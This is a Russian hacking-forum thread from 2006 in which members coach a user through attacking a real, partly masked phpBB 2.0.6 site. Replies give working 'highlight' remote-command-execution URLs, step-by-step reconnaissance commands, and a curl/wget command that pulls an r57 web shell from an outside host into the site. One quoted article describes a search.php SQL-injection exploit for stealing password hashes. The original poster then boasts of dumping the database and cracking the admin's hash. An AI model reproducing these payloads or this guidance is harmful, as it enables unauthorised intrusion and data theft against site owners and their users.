ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Как использовать уязвимость highlight на phpBB 2.0.6?
  #1  
Старый 31.05.2006, 23:55
Аватар для Shtirlic
Shtirlic
Новичок
Регистрация: 13.12.2005
Сообщений: 7
Провел на форуме:
15902

Репутация: 0
По умолчанию Как использовать уязвимость highlight на phpBB 2.0.6?

Саламмалейкум...
дело такое....
www.*****.com/forums/ -напрач дырявый....с помощью команд &highlight=%2527.$poster=%60$var%60.%2527&var=i d и &highlight=%2527.$poster=$dbpasswd(name).%2527 получил логин и пасс от базы....дело в том что в MYSQL ИДЕНТИФИКАЦИЯ по IP.........что можно сделать? думал о подмене IP но это геморно....

Последний раз редактировалось Shtirlic; 01.06.2006 в 00:18..
 
Ответить с цитированием

  #2  
Старый 01.06.2006, 00:11
Аватар для pch
pch
Познающий
Регистрация: 22.10.2005
Сообщений: 37
Провел на форуме:
520745

Репутация: 141
По умолчанию

Залей RST MySQL v2.0 и через неё подцепи базу. Советую вначале разархивировать файл и перезалить его на какой-нибудь народ, но уже с расширением .txt. Далее командой wget -o ./cache/shell.php http://xxx.narod.ru/s.txt загоняешь скрипт в папку cache
 
Ответить с цитированием

  #3  
Старый 01.06.2006, 12:02
Аватар для *Van*
*Van*
Постоянный
Регистрация: 14.08.2005
Сообщений: 378
Провел на форуме:
670862

Репутация: 54
Отправить сообщение для *Van* с помощью ICQ
По умолчанию

&highlight=%2527.$poster=`$cmd`.%2527&cmd=id - если выполняется id, то вполне вероятно, можно залить шелл. Если не получается, скинь мне ссылку на форум в ПМ, помогу.
 
Ответить с цитированием

  #4  
Старый 02.06.2006, 14:02
Аватар для Desr0w
Desr0w
Постоянный
Регистрация: 01.02.2006
Сообщений: 523
Провел на форуме:
1730553

Репутация: 319


Отправить сообщение для Desr0w с помощью ICQ
По умолчанию

Цитата:
Сообщение от pch  
Залей RST MySQL v2.0 и через неё подцепи базу. Советую вначале разархивировать файл и перезалить его на какой-нибудь народ, но уже с расширением .txt. Далее командой wget -o ./cache/shell.php http://xxx.narod.ru/s.txt загоняешь скрипт в папку cache
Цитата:
дело в том что в MYSQL ИДЕНТИФИКАЦИЯ по IP.........что можно сделать? думал о подмене IP но это геморно....
Осуществляется подключение определенново ip адреса или с локал-хоста.
Цитата:
Советую вначале разархивировать файл и перезалить его на какой-нибудь народ, но уже с расширением .txt
Мдя,думай прежде чем написать или хотя бы попробуй повторить на себе то что посеветовал человеку.
 
Ответить с цитированием

  #5  
Старый 02.06.2006, 14:04
Аватар для Desr0w
Desr0w
Постоянный
Регистрация: 01.02.2006
Сообщений: 523
Провел на форуме:
1730553

Репутация: 319


Отправить сообщение для Desr0w с помощью ICQ
По умолчанию

Название топика - Как использовать уязвимость viewtopic на phpBB 2.0.6?
Ковыряем 2.0.6

Что касается более старой версии форума, 2.0.6, то об этой уязвимости известно уже давно, но количество уязвимых ресурсов не спешит сокращаться. Под нашим прицелом находится скрипт search.php, осуществляющий поиск по конференциям. Если внимательно посмотреть на код этого сценария, можно заметить, что когда переменная $show_results не установлена в значение posts или topics, становится возможным поместить в $search_results ядовитую строку, которая изменит выполняемый sql-запрос.

Поскольку об этом баге известно уже давно, появился даже эксплоит, который самостоятельно реализует sql-injection: тебе нужно лишь указать URL форума, имя пользователя, пароль которого тебя интересует, и идентификатор валидного топика. Скачать сплоит, написанный на php, можно здесь: http://www.scan-associates.net/paper...uh-v2.php.txt; для его нормальной работы нужна библиотека cURL.

Чтобы проверить какой-либо из серверов на уязвимость, этот сценарий нужно залить на сервер и выполнить примерно следующим образом:

Sploit.php http://forum.site.ru user 12

Где http://forum.site.ru – это адрес форума, user – ник пользователя, чей пароль интересен, а 12 – идентификатор топика, в обсуждении которого участвовал пациент. Если форум уязвим, в результате работы эксплойта на экране появится хэш пароля пользователя user и останется лишь расшифровать его. Если же появилась строка «Not vulnerable, register_globals=Off», это означает, что форум неуязвим из-за настроек PHP. Справедливости ради надо отметить, что register_globals=Off – это дефолтные настройки интерпретатора, но умников в инете хватает.
хакеr.ru
 
Ответить с цитированием

  #6  
Старый 03.06.2006, 03:08
Аватар для Shtirlic
Shtirlic
Новичок
Регистрация: 13.12.2005
Сообщений: 7
Провел на форуме:
15902

Репутация: 0
По умолчанию

ты обрати внимание на первый пост! там расматривается канкретная проблема....=)
то VAn шелл не могу загрузить кароч всё виснит...

Последний раз редактировалось Shtirlic; 03.06.2006 в 03:14..
 
Ответить с цитированием

  #7  
Старый 03.06.2006, 03:10
Аватар для Desr0w
Desr0w
Постоянный
Регистрация: 01.02.2006
Сообщений: 523
Провел на форуме:
1730553

Репутация: 319


Отправить сообщение для Desr0w с помощью ICQ
По умолчанию

Я посмотрел на название топика.
Ты безнадёжен.
 
Ответить с цитированием

  #8  
Старый 03.06.2006, 14:29
Аватар для *Van*
*Van*
Постоянный
Регистрация: 14.08.2005
Сообщений: 378
Провел на форуме:
670862

Репутация: 54
Отправить сообщение для *Van* с помощью ICQ
По умолчанию

Мда....

1)http://сайт/forums/viewtopic.php?p=200&highlight=%2527.$poster=%60$cm d%60.%2527&cmd=id
Смотрим свои права.
2)http://сайт/forums/viewtopic.php?p=200&highlight=%2527.$poster=%60$cm d%60.%2527&cmd=pwd
Смотрим полный путь к форуму.
3)http://сайт/forums/viewtopic.php?p=200&highlight=%2527.$poster=%60$cm d%60.%2527&cmd=ls%20-la
Смотрим права на директории. В директории /forums/ нет папок с нужными нам правами.
4)http://сайт/forums/viewtopic.php?p=200&highlight=%2527.$poster=%60$cm d%60.%2527&cmd=cd%20..;ls%20-la
Переходим на директорию выше. И снова смотрим папки. Находим папку с правами drwxrwxrwx.
4)http://сайт/forums/viewtopic.php?p=200&highlight=%2527.$poster=%60$cm d%60.%2527&cmd=which%20lynx%20links%20get%20wget%2 0fetch%20curl
Смотрим какие качалки нам доступны.
5)http://сайт/forums/viewtopic.php?p=200&highlight=%2527.$poster=%60$cm d%60.%2527&cmd=curl%20--output%20/home/сайт/public_html/hiscores/shell.php%20http://rst.void.ru/download/r57shell.txt
Заливаем шелл.

_http://сайт/hiscores/shell.php - он будет тут.

Просто давать ссылку на шелл, который я залил не хочу. Сделай что-нибудь сам. Если уж после того, как я всё расписал у тебя не получится, то ты действительно совсем безнадёжен.

Последний раз редактировалось *Van*; 03.06.2006 в 14:34..
 
Ответить с цитированием

  #9  
Старый 28.06.2006, 03:23
Аватар для Shtirlic
Shtirlic
Новичок
Регистрация: 13.12.2005
Сообщений: 7
Провел на форуме:
15902

Репутация: 0
По умолчанию

Цитата:
Сообщение от *Van*  
я всё расписал у тебя не получится, то ты действительно совсем безнадёжен.
ну..ну...
закрывайте тему....форум пломан....
База на руках
АДмин лох....его хэш через 15 секунд расшифровался..
____________________________________________
С уважением к некоторым!
 
Ответить с цитированием

  #10  
Старый 28.06.2006, 03:39
Аватар для Shtirlic
Shtirlic
Новичок
Регистрация: 13.12.2005
Сообщений: 7
Провел на форуме:
15902

Репутация: 0
По умолчанию

r57ШЕлл давал возможность выполнять команды тока в папке в каторую он был закинут....единственное что можно было сделать так это Бэк и Бинд-конект....и один фиг они ничо не дали права остались НОубади...наконец...наткнулс я на папку tmp в каторой так и ждалала миня БД...в итоге....база на руках...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Вопрос по заливке шелла, используя уязвимость highlight в форуме phpBB 2.0.6 vega2k Форумы 12 11.01.2009 15:57
какОй трой ИСпоЛЬзоваТЬ длЯ поЛНого УПРАвЛЕиЕ уд.КОМПОМ? UnKn0wN E-Mail 32 08.04.2006 04:20
Как использовать cross-site scripting (css) foreva Чужие Статьи 0 06.02.2005 19:03



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ